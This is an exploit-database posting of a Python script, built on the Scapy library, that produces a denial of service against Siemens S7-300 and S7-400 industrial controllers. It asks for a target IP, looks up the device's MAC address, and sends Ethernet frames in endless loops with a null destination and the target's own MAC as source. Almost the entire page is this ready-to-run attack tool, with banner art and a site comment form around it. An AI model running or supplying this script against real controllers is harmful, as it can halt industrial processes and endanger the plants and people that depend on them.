Siemens S7 Layer 2 Denial of Service (DoS)

2022.01.05
Credit: RoseSecurity
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS) # Date: 21/10/2021 # Exploit Author: RoseSecurity # Vendor Homepage: https://www.siemens.com/us/en.html # Version: Firmware versions >= 3 # Tested on: Siemens S7-300, S7-400 PLCs #!/usr/bin/python3 from scapy.all import * from colorama import Fore, Back, Style from subprocess import Popen, PIPE from art import * import threading import subprocess import time import os import sys import re # Banner print(Fore.RED + r""" ▄▄▄· ▄• ▄▌▄▄▄▄▄ • ▌ ▄ ·. ▄▄▄· ▄▄▄▄▄ ▄▄▄ ▐█ ▀█ █▪██▌•██ ▪ ·██ ▐███▪▐█ ▀█ •██ ▪ ▀▄ █· ▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ ▀ ▀ ▀▀▀ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▄▄▄▄▄▄▄▄ .▄▄▄ • ▌ ▄ ·. ▪ ▐ ▄ ▄▄▄· ▄▄▄▄▄ ▄▄▄ •██ ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██ ▪ ▀▄ █· ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪▀▀▀▀▀▀▀▀ █▪ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ """) time.sleep(1.5) # Get IP to exploit IP = input("Enter the IP address of the device to exploit: ") # Find the mac address of the device Mac = getmacbyip(IP) # Function to send the ouput to "nothing" def NULL (): f = open(os.devnull, 'w') sys.stdout = f # Eternal loop to produce DoS condition def Arnold (): AutomatorTerminator = True while AutomatorTerminator == True: Packet = Ether() Packet.dst = "00:00:00:00:00:00" Packet.src = Mac sendp(Packet) NULL() def Sarah (): AutomatorTerminator = True while AutomatorTerminator == True: Packet = Ether() Packet.dst = "00:00:00:00:00:00" Packet.src = Mac sendp(Packet) NULL() def Kyle (): AutomatorTerminator = True while AutomatorTerminator == True: Packet = Ether() Packet.dst = "00:00:00:00:00:00" Packet.src = Mac sendp(Packet) NULL() # Arnold ArnoldThread = threading.Thread(target=Arnold) ArnoldThread.start() ArnoldThread.join() NULL() # Sarah SarahThread = threading.Thread(target=Sarah) SarahThread.start() SarahThread.join() NULL() # Kyle KyleThread = threading.Thread(target=Kyle) KyleThread.start() KyleThread.join() NULL()


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top